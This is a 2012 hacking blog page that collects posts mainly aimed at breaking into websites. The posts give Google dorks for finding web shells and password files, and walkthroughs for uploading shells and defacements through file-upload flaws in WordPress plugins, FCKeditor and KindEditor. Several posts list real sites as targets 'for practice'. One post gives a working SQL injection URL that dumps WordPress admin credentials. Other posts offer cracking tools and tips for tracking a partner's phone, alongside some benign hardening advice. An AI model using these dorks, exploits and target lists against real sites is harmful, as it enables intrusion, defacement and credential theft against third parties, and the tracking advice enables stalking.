Banner 468 x 60px

LikeViews

Saturday, 28 January 2012

Find Uploaded shells and Passwords By Google dorks (priv8 dorks)

Comments
Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !!

Dorks for finding shells:

inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"

"Shell" filetype:php intext:"uname -a:" "EDT 2010"

intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]

inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update


Dorks for finding Passwords:

filetype:htpasswd htpasswd
intitle:"index of" ".htpasswd" -intitle:"dist" -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurlasslist.txt (para encontrar listas de passwords)
intitle:"index of..etc" passwd
intitle:admin intitle:login
"incorrect syntax near" (sql script error)
intitle:"the page cannot be found" inetmgr (debilidad en iis4)
intitle:index.of ws_ftp.ini
"supplied arguments is not a valid postgresql result" (possible debilidad sql)
_vti_pvt password intitle:index.of (frontpage)
inurl:backup intitle:index.of inurl:admin
"index of /backup"
index.of.password
index.of.winnt

inurl:"auth_user_file.txt"
"index of /admin"
"index of /password"
"index of /mail"
"index of /" +passwd
index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurlasswd filetype:txt
inurl:admin filetypeBig Grinb
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.1st
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members or accounts
intitle:"index of" user_carts or user _cart
Read more...

Thursday, 26 January 2012

Wireless Hacking Tools 2011 : Free Download

Comments
WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easier. This script was written on Backtrack 4 and designed to be used with Backtrack 4. This script was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. This script needs to be ran as root.

1. Wireless hacking tool AIO 2009 edition with a few tweaks by tweaker so updated to 2011.
2. Airodump and Airongcrack etc. to get WEP and WPA password.
3. WiPhire airodump is an 802.11 packet capture program that is designed to "capture as much encrypted traffic as possible...each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack on the resulting capture file. aircrack will then perform a set of statistical attacks developed by a talented hacker named KoreK."

These are the functions of the script :
autoMACtic MAC spoofer
Ability to crack WEP networks
Ability to crack WPA networks
Perform simple MITM attacks
DNSspoof a network
Use airdrop-ng to create a jammer

Programs that WiPhire Uses:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
airdrop-ng
xterm
crunch
pyrit
sslstrip
arpspoof
macchanger
kate
apache2
ettercap
Firefox

If a virus alert occurs disregard that as for these are hacking tools and they will be flagged as virus's no matter what.

Download:
http://hotfile.com/dl/95289912/805d3d5/WHT2OII.rar.html
Mirror 1:
http://www.fileserve.com/file/mCesPNH/WHT2OII.rar
Mirror 2:
http://www.filesonic.com/file/54270824/WHT2OII.rar

Read more...

"Add Testimonial" : Remote File Upload Vulnerability.

Comments
[#1] Open website ..

[#2] Go to this URL: testimonial/add.html.php 

For example:  http://Site.com/testimonial/add.html.php

[#3]
Now Upload Your Deface or any file

[#4] To view you upload file go to /images/testimonial/ , you'll see index of files here ... click on last file, its yours !!

[#5] Enjoy=) and do leave a Comment below if you Like it

Demo :
http://sdhealingarts.com/testimonial/add.html.php?
http://slangmediagroup.com/testimonial/add.html.php?
http://thepharmcollective.com/testimonial/add.html.php?
http://www.ganjadaddy.com/demo/firestation/testimonial/add.html.php?

Read more...

HTML Editor File Upload Vulnerability

Comments
Google Dork:
inurl:/HTMLEditor/editor/ 
or 

"inurl:/HTMLEditor/editor//filemanager/"
or
 "inurl:/HTMLEditor/editor//filemanager//connectors/"

Exploit: 
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or  
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Go here, http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html Change connectors into .php (Like FCKeditor) and upload your file


supported files: .txt and .jpg in some site you can upload .html and .php too

To view you file go-to: http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here 


Live Demo:  
Read more...

Tuesday, 24 January 2012

WPScan v.1.1 is released, a WordPress Security vulnerability scanner

Comments
“WPScan is a WordPress Security vulnerability scanner which checks the security of WordPress installations using a black box approach, written in Ruby.

DETAILS
  • Username enumeration (from author querystring and location header)
  • Weak password cracking (multithreaded)
  • Version enumeration (from generator meta tag and from client side files)
  • Vulnerability enumeration (based on version)
  • Plugin enumeration (2220 most popular by default)
  • Plugin vulnerability enumeration (based on plugin name)
  • Plugin enumeration list generation
  • Other misc WordPress checks (theme name, dir listing, ...)

Change-log for WPScan v.1.1:

  • Detection for 750 more plugins.
  • Detection for 107 new plugin vulnerabilities.
  • Detection for 447 possible timthumb file locations.
  • Advanced version fingerprinting implemented.
  • Full Path Disclosure (FPD) checks.
  • Auto updates.
  • Progress indicators.
  • Improved custom 404 checking.
  • Improved plugin detection.
  • Improved error_log checking.
  • Lots of bugs fixed. Lots of small tweaks.
Read more...

OpenDNS released preview of DNSCrypt Tool (Secures DNS Traffic)

Comments
OpenDNS released a preview of DNSCrypt Tool , a piece of lightweight software that everyone should use to boost online privacy and security.  It works by encrypting all DNS traffic between the user and OpenDNS, preventing any spying, spoofing or man-in-the-middle attacks.

For now, DNSCyrpt supports only Mac platform.

DNSCrypt works like SSL in that it wraps all DNS traffic with encryption the same way SSL wraps all HTTP traffic, it's not the crypto library being used. We're using elliptical-curve cryptography, in particular the Curve25519 eliptical curve. The design goals are similar to those described in the DNSCurve forwarder design.

What about DNSSEC? Does this eliminate the need for DNSSEC?

No. DNSCrypt and DNSSEC are complementary. DNSSEC does a number of things. First, it provides authentication. (Is the DNS record I'm getting a response for coming from the owner of the domain name I'm asking about or has it been tampered with?) Second, DNSSEC provides a chain of trust to help establish confidence that the answers you're getting are verifiable. But unfortunately, DNSSEC doesn't actually provide encryption for DNS records, even those signed by DNSSEC. Even if everyone in the world used DNSSEC, the need to encrypt all DNS traffic would not go away. Moreover, DNSSEC today represents a near-zero percentage of overall domain names and an increasingly smaller percentage of DNS records each day as the Internet grows.

That said, DNSSEC and DNSCrypt can work perfectly together. They aren't conflicting in any way. Think of DNSCrypt as a wrapper around all DNS traffic and DNSSEC as a way of signing and providing validation for a subset of those records. There are benefits to DNSSEC that DNSCrypt isn't trying to address. In fact, we hope DNSSEC adoption grows so that people can have more confidence in the entire DNS infrastructure, not just the link between our customers and OpenDNS.
Download DNSCrypt
Read more...

Saturday, 21 January 2012

KindEdior Remote File Upload Exploit

Comments
Google Dork:
 
  • intitle:index of? inurl:kindeditor
  • inurl:examples/uploadbutton.html
  
Exploit: http://www.vulnrabewebsite.com/path/kindeditor/examples/uploadbutton.html

Choose any website from google search results and go-to vulnerable URL like http://www.vulnrabewebsite.com/kindeditor/examples/uploadbutton.html now click on upload and select your file, it will be automaticly uploaded,and you'll get your uploaded file Link/URL there, and if you can't get your uploaded file link then go-to http:// www.vulnrabewebsite.com/path/kindeditor/attached/file/
and you'll see alot of folders there, click on last folder and in the folder click on last file, its your uploaded file. Enjoy & Must leave a Comment if you want more exploit like that, because 
new article's posting depends on old article's popularity

Live Demo :
http://www.arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
Read more...

Friday, 20 January 2012

43 Excellent WordPress Security Tips & Plugins

Comments
After putting in all of the time, and perhaps money, into your WordPress website or blog, its now time to secure and protect it from outside enemies and general bad guys: hackers, spammers and all round tossers.
Without a doubt, for a self-hosted blog, WordPress is the best blog CMS that you can get. Though it comes packed with security features, being a popular and open source software, it also means that hackers have full access to the code which they can scrutinize to find any exploits they can use to hack into any WordPress-enabled site.
On the good side, one of the best things about WordPress is its plugin system that allows anyone to install any plugins or create your own plugins to extend its functionality, including improving security.
Here, I have listed some wordpress security tips and plugins that you can use to secure WordPress blog.

Security Tips


1. Nobody should be allowed to search your entire server.

  • WPdesigner advices us to NOT use this search code in the search.php
    <?php echo $_SERVER ['PHP_SELF']; ?>
    Nobody should be allowed to search your entire server, or? Use this one instead:
    <?php bloginfo ('home'); ?>
  • Block WP- folders from being indexed by search engines, the best way to block them in your robots.txt file. Add the following line to your list:
    Disallow: /wp-*

2. Directories should not be left open for public browsing

There is a potential problem letting people know what plugins you have, or what versions they are. If there is some known exploit that is linked to a plugin, it could be easy enough for someone to use it to their advantage. Make an empty wp-content/plugins/index.html file or just add this line in your .htaccess file in your root:
Options All -Indexes

3. Drop the version string in your Meta Tags

A large number of WordPress themes have the WordPress Meta Tag that show the version of WordPress that is running on your blog which is an easy way to get your blog prone to hackers if you didn’t upgrade to the security-enhanced file permissions on both which is pointed out by Matt Cutts. Another solution involves a plugin that sets up a secondary new version.
This tag is in the header.php file that displays your current version of wordpress.
<meta content="WordPress &lt;?php bloginfo(’version’); ? /&gt;" name="generator" />

4. Stay Updated

You need to keep your on your plugin/widget, theme, and WordPress versions updated. Also, subscribing to the plugin/widget/theme Author’s RSS feeds makes keeping up with them much easier.

5. Take regular backups of your site and Database

You always have to take regular backups of your file directories as well as the database. WordPress Database Backup plugin creates backups of your core WordPress tables as well as other tables of your choice in the same database.

6. Use SSH/Shell Access instead of FTP

If someone gets a hold of your FTP login information (which is usually not encrypted and easy to get), they can manipulate your files and add spam to your site without you even knowing about it! Using SSH, everything is encrypted including the transfer of files, etc.

7. Stop worrying about your wp-config.php file

Keep your database username and password Safe by adding the following to the .htaccess file at the top level of your WordPress install:
<FilesMatch ^wp-config.php$>deny from all</FilesMatch>
This will make it harder for your database username and password to fall into the wrong hands in the event of a server problem.

8. Block WP- folders from the Search Engines

There is no need to have all of your filesWordpress files indexed by Google, so it’s best to block them in your robots.txt file. Add the following line to your list
Disallow: /wp-*

9. Block access to WP-Admin folder using .htaccess

There is an article written Reuben that talks about how you can protect your WordPress admin folder by allowing access to it from a defined set of IP addresses. Everything else will bring up a Forbidden error message. So if you only access your blog from one or two places routinely, it’s worth implementing. Also, you’re supposed to create a new .htaccess file inside your wp-admin folder, not replace the one at the root of your blog

10. Don’t Use Default Passwords

Are you still logging into your wp-admin page with the same default password that was emailed to you? If so, CHANGE IT! You can follow the instructions given in the article “Hack Proof Password” posted by us earlier to imrove the strength of your password.

11. Change database table prefix

The default prefix used by WordPress is “wp”. You can easily change the prefix to other terms that are difficult to guess using the WP-Security-Scan. More detail on this plugin below.

12. Don’t use (or better yet, remove) the default “admin” username

When you install WordPress, it automatically generates a user with Administrator-level permissions called admin. It is strongly recommended that you do not use this username to make it harder for the hacker to guess your username and password via Brute force attacks. Even if you downgrade its permission role, it’s still a better idea just to remove this user altogether.
You can use the Change Username Plugin to change the Username of Admin Account.

Security Plugins


13. Secure WordPress

Download
Plugin HomePage
It will help secure WordPress installation by removing miscellaneous items after the installation process which may aid hackers. It will remove error information from the login-page and also remove or change the WP-version data but leave it unchanged in the admin area. It is suggested to remove any unwanted information to the non-admin for security reasons so it will remove update information about plugins, themes and core update information. Secure WordPress will add a blank index.html to the plug-in directory such that if anyone is trying to view the contents of the directory they will be viewing a blank page instead of the contents.

14. Force SSL

Download
Plugin HomePage
Having a secure SSL connection to communicate with your users is beneficial. To enable this, your site must be SSL enabled first. To implement this, you need to buy the SSL certificate. By installing this plug-in it will force your user browser to connect to your site via a SSL connection. This eliminates any third party attacks between the connection and all the data that is transmitted to and from the site will be encrypted for better security.

15. Chap Secure Login

Download
Plugin HomePage
If you are not having a secure connection like SSL to protect your password , then you can use this plug-in for encrypting passwords. It will use the Chap protocol to hide the passwords and transmit it encrypted. The only information that is transmitted unencrypted is your username. Protecting password will give full security because password leaks will enable the hacker the gain full control of your WordPress blog.

16. HTTP Authentication

Download
Plugin HomePage
The HTTP Authentication plugin allows you to use existing means of authenticating users for WordPress. This includes Apache’s basic HTTP authentication module and many others.

17. Anonymous WordPress Plugin

Download
Plugin HomePage
All the WordPress versions 2.3 and above have the feature to get automatic updates for plugins. During this process it will send some of your information like your blog’s URL, version number, list of installed plugins and activated plugins to WordPress.org. This information could be of potential use for hackers. So to avoid this, installing Anonymous WordPress plug-in is a feasible option. It will strip off your blog’s URL and version number and empty the activated plugins list. This plug-in is compatible with WordPress 2.3 and above.

18. Login Encrypt

Download
Plugin HomePage
This will help encrypt the login information using the complex DES and RSA combination. It uses the JavaScript appended and encrypted the password of the user and generates a unique DES key. And by using this key, user can have secure login each time they login to your blog.

19. Admin SSL

Download
Plugin HomePage
This plug-in will work with both the private and shared SSL connections and it will force a SSL connection in every page where password can or has to be entered. It is very helpful to protect the admin area, posts and all the pages of your WordPress installation and secure the login page. This plug-in works on WordPress 2.2 to 2.7.

20. AskApache Password Protect

Download
Plugin HomePage
It will block the bots and creates a safe wall for any vulnerability your WordPress blog may have. It will protect your password as well as your WordPress directories like the wp-includes, wp-content, etc. It is like placing your WordPress blog behind a security wall.

21. TAC (Theme Authenticity Checker)

Download
Plugin HomePage
TAC stands for Theme Authenticity Checker. Currently, TAC searches the source files of every installed theme for signs of malicious code. If such code is found, TAC displays the path to the theme file, the line number, and a small snippet of the suspect code. As of v1.3 TAC also searches for and displays static links.

22. Invisible Defender

Download
Plugin HomePage
This plugin protects registration, login and comment forms from spambots by adding two extra fields hidden by CSS. This approach gave me 100% anti-spam protection on one of my sites.

23. Semisecure Login Reimagined

Download
Plugin HomePage
Semisecure Login Reimagined increases the security of the login process using an RSA public-key to encrypt the password on the client-side when a user logs in. The server side then decrypts the encrypted password with the private key. JavaScript is required to enable encryption. It is most useful for situations where SSL is not available, but the administrator wishes to have some additional security measures in place without sacrificing convenience.

24. Stealth Login

Download
Plugin HomePage
This plugin allows you to create custom URLs for logging in, logging out, administration and registering for your WordPress blog. Instead of advertising your login url on your homepage, you can create a url of your choice that can be easier to remember than wp-login.php, for example you could set your login url to http://www.myblog.com/login for an easy way to login to your website.

25. WordPress File Monitor

Download
Plugin HomePage
Monitors your WordPress installation for added/deleted/changed files. When a change is detected an email alert can be sent to a specified address.

26. WordPress Firewall Plugin

Download
Plugin HomePage
This WordPress plugin investigates web requests with simple WordPress-specific heuristics to identify and stop most obvious attacks. There exist a few powerful generic modules that do this; but they’re not always installed on web servers, and difficult to configure.
It intelligently whitelists and blacklists pathological-looking phrases based on which field they appear within in a page request (unknown/numeric parameters vs. known post bodies, comment bodies, etc.)

27. WordPress Guard Plugin

Download
Plugin HomePage
Angsuman’s WordPress Guard Plugin is a must-have WordPress security plugin that protects the vulnerable areas of your blog from outside access with an additional layer of security.

28. WP-Dephorm

Download
Plugin HomePage
wp-dephorm protects your users from the prying eyes of phorm. This is achieved by setting a cookie to opt out of the phorm information mining. Your blog viewers will not have their information stored and used in marketing campaigns whilst viewing your site.

29. WP Security Scan

Download
Plugin HomePage
Scans your WordPress installation for security vulnerabilities and suggests corrective actions.
-passwords
-file permissions
-database security
-version hiding
-WordPress admin protection/security
-removes WP Generator META tag from core code

30. AntiVirus

Download
Plugin HomePage
AntiVirus for WordPress is a smart and effective solution to protect your blog against exploits and spam injections. AntiVirus protection for your blog.

31. WordPress Exploit Scanner

Download
Plugin HomePage
This plugin searches the files on your website, and the posts and comments tables of your database for anything suspicious. It also examines your list of active plugins for unusual filenames.
It does not remove anything. That is left to the user to do.

32. Paranoid911

Download
Plugin HomePage
Paranoid911 checks your wordpress installation for changes and sends you an email when changes occur.

AntiSpam Plugins


33. Defensio Anti-Spam

Download
Plugin HomePage
Defensio is an advanced spam filtering web service that learns and adapts to your behaviors and those of your readers. Defensio aims to be an all-in-one anti-spam solution. Therefore, using it along with other anti-spam plugins WILL cause problems. PLEASE deactivate Akismet and other similar plugins before activating Defensio.

34. Simple Trackback Validation

Download
Plugin HomePage
Simple Trackback Validation Plugin performs a simple but very effective test on all incoming trackbacks in order to stop trackback spam.

35. NoSpamNX

Download
Plugin HomePage
NoSpamNX is the successor of Yawasp (Yet Another WordPress antispam plugin) and is a plugin to protect against automated comment spam (spambots). While Yawasp changed the names of the form fields in the comment template, NoSpamNX works without these modifications, but is equally effective. By eliminating the need for modifications within the form field maximum compatibility with other WordPress plugins or browsers is ensured.
When calling the comment form NoSpamNX adds extra fields (hidden before the “normal” user) automatically to your comment template. When a comment is saved, these fields are checked. For additional protection, the order and the values of these fields change periodically, so that no spambot can adapt to a specific blog adapt.

36. SI CAPTCHA Anti-Spam

Download
Plugin HomePage
SI CAPTCHA adds CAPTCHA anti-spam methods to WordPress on the comment form, registration form, or both. In order to post comments, users will have to type in the phrase shown on the image. This prevents spam from automated bots. It works great with Akismet.

37. AntiSpam Bee

Download
Plugin HomePage
AntispamBee protects blogs from digital rubbish. It is made up of sophisticated techniques and analyzes comments including pings. Also, for reasons of data privacy, the use of AntispamBee is a safe solution, as it is anonymous and registration-free.

38. Akismet

Download
Plugin HomePage
Akismet is quite possibly the most important and useful plugin you will ever install. It has been developed by the actual team behind WordPress, if that is not enough of a seal of of approval and a guarantee, I don’t know what is.
In a nutshell, Akismet checks your comments against the Akismet web service to see if they look like spam or not and lets you review the spam it catches under your blog’s “Comments” admin screen.

39. WP-reCAPTCHA

Download
Plugin HomePage
The reCAPTCHA plugin is one you’ve probably seen around on sites such as Facebook, Twitter and StumbleUpon. It isn’t just your average CAPTCHA (an image containing some letters that are designed so only humans can read them), it uses words from old books, so every time you enter a reCAPTCHA, you’re helping digitise books. At this point, you’re probably thinking but if I’m telling it what the words mean, does that mean I can enter anything? How does that stop spammers? The answer is simple – there are two words, one of which the CAPTCHA knows. The second, it doesn’t and you’re helping digitise it.

Backup Plugins


40. WordPress EZ Backup

Download
Plugin HomePage
WordPress EZ Backup is A Administrators Plugin to allow the easiest most feature rich method for creating Backup Archives of your entire Site (not just WP Installations but Any part of your site or webspace) & allows backup archives of any MySQL Database you choose & More

41. WordPress Database Backup

Download
Plugin HomePage
WordPress database backup creates backups of your core WordPress tables as well as other tables of your choice in the same database.

42. WP-DBManager

Download
Plugin HomePage
Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up and optimizing of database.

43. BackUpWordPress

Download
Plugin HomePage
BackUpWordPress is a Backup & Recovery Suite for your WordPress website. This Plugin allows you to backup database as well as files and comes with a rich set of options.
Read more...

Wednesday, 18 January 2012

Chat with Friends through MS-DOS Command Prompt

Comments
All you need is your friend's I.P. Address and your Command Prompt.

  • Then Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

  • Now save this as "Messenger.Bat".
  • Open Command Prompt.
  • Drag this file (.bat file) over to Command Prompt and press Enter.
  • You would then see something like this:

  • Now, type the I.P. Address of the computer you want to contact and press enter.
  • Now all you need to do is type your message and press Enter.
    Start Chatting.......!
Read more...

Monday, 16 January 2012

WordPress Plugin : tdo Mini File Upload Vulnerability

Comments
WordPress Plugin : tdo Mini  File Upload Vunerablity

Google Dork : 
"inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1"
Go to google.com and enter this dork  
"inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1"

Now see the results and select any site.......

Now upload your deface as deface.html;.jpg and upload your shell as shell.asp;.jpg or shell.php;.jpg

and see your uploaded file here....
www.site.com/wp/wp-content/uploads/tdomf/tmp/1/Yourfilehere
Read more...

Sunday, 15 January 2012

New Wordpress Exploit : 10K+ Websites vulnerable through this attack

Comments
WordPress Easy Comment Upload Vulnerability:

Google Dork:
  • "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"  
  • /wp-content/plugins/easy-comment-uploads/upload-form.php 
  • Index of /wp-content/plugins/easy-comment-uploads

Open Google and enter any dork given above..
Now selct any website 
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Get Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere


Note :- In some websites you can Upload your deface in .txt on only ... and you can upload shell in 50% sites only ... upload shell in image format i.e. shell.asp.jpg


Live Demo :- 
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php

 


Read more...

Friday, 13 January 2012

Wordpress FCKEDITOR upload Vunerablity : Upload Your Deface Remotely

Comments
This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here 

  1. open Google.com and enter Dork: 
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
inurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one 
http://www.schoolshopper.com.au/
Then i'll will simply add the vulnerability URL after the website 

Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

(The path may be changed in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This:

 Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url 
  • www.site.com/deface.html
  • or
  • www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html
 
FOR PRACTICE.. 
  • http://ruthsgarden.com/jaihind.html
  • http://www.utahflowers.net/jaihind.html
  • http://www.eesnet.org/jaihind.html
  • http://bestonlinediscounts.net/
  • http://wenrestaurant.com/
  • http://ruthsgarden.com/
  • http://www.utahflowers.net/
  • http://www.inlove.my/
  • http://megamall.com.pk/
  • http://stefanyboutique.com/
  • http://www.virtualgeorge.info/
  • http://iphoneclone.biz/
  • http://amourcristallis.com/
  • http://www.eesnet.org/
  • http://www.schoolshopper.com.au/
  • http://www.mymaxi.nl/
  • http://wiretek.net/
  • http://shop.tjokgus.com/
  • http://www.aquariumsystem.it/
  • http://uae-shopper.com/
  • http://organicjewelries.com/
  • http://www.granmasantiques.com/
  • http://avocadogenie.com/
  • http://www.inputandanalysis.com
  • http://eddiegifts.com/
  • http://bestonlinediscounts.net/
  • http://wenrestaurant.com/
  • http://ruthsgarden.com/
  • http://www.utahflowers.net?/
  • http://www.inlove.my/
  • http://megamall.com.pk/
  • http://stefanyboutique.com?/
  • http://www.inputandanalysis.com/
  • http://www.virtualgeorge.info/
  • http://iphoneclone.biz/
  • http://amourcristallis.com?/
  • http://www.eesnet.org/
  • http://www.schoolshopper.com.au/
  • http://www.mymaxi.nl/
  • http://wiretek.net/
  • http://shop.tjokgus.com/
  • http://www.aquariumsystem.it/
  • http://uae-shopper.com/
  • http://organicjewelries.com/
  • http://www.granmasantiques.com/
  • http://avocadogenie.com/
  • http://www.inputandanalysis.com/
  • http://www.utahflowers.net/
  • http://stefanyboutique.com/
  • http://amourcristallis.com/
Read more...

Thursday, 12 January 2012

Simplest way to hack any Wordpress based site

Comments
In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.



First we'll use this dork to search website with the help of Google

inurl:"wp-content/plugins/photoracer/viewimg.php?id="


Results: 


I'm now gonna test one of them..

For eg..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2 

Now add the Exploit..

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
This is the exploit.. (GIVEN ABOVE)

And now the site address will become..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Now you can see the ADMIN and PASS....just crack the HASHES and you're done..

Site Admin Login page for WP
http://www.SITE-ADDRESS/wp-login.php
Read more...

Sunday, 8 January 2012

Ping.fm vulnerable to Clickjacking

Comments
Two Indian Hackers Aditya Gupta(@adi1391) and Subho Halder (@sunnyrockzzs) have discovered Clickjacking vulnerability in one of the famous website "Ping.FM". Clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

This is based on a technique known as clickjacking ( or UI Redressing ) where an attacker could perform actions on the behalf of user by tricking the user to click on a button or perform some other action.

This vulnerability was earlier seen in Twitter where it allows the status to be loaded through the GET method, and an attacker could frame the twitter webpage and trick the user to click on the tweet button, with the user thinking that its a part of the attacker's webpage.

This can be disabled by setting the X-FRAME-ORIGIN method to SAME ORIGIN or DENYING the use of webpage inside a frame which have been adopted by google, facebook and many other famous websites.

Ping.fm is a online service which allows the user to connect to many social networks at once. However an attacker could use a technique known as Clickjacking to silently update the user's social networking status at Twitter, Facebook and all other connected accounts.In this technique, the user is tricked into clicking on a button on a webpage designed by the attacker,which silently updates the status of the user on the social netowrks status taking advantage of thePing.fm API and clickjacking technique.

Video DEMO POC:


Read more...

Trace Anyones Mobile with G.P.S. and without G.P.S.

Comments
Do you doubt on your Boyfriend/Girlfriend ? Do you wanna track them via mobile location? This is now possible...I'm not joking. Many of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done.  Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in G.P.S. cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (:P) . This PhoneOnMap can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.

If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.


Features of  GPS cell phone tracking system :-

1. GPS cell phone tracker and locater will not work in the underground transportation .
2. The application does not work when the phone is turned off.
3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .
4. Once application is uninstalled from cell phone than you can’t do anything .
5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .

Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.

As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating boyfriend/girlfrend…(lol)
Read more...
 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS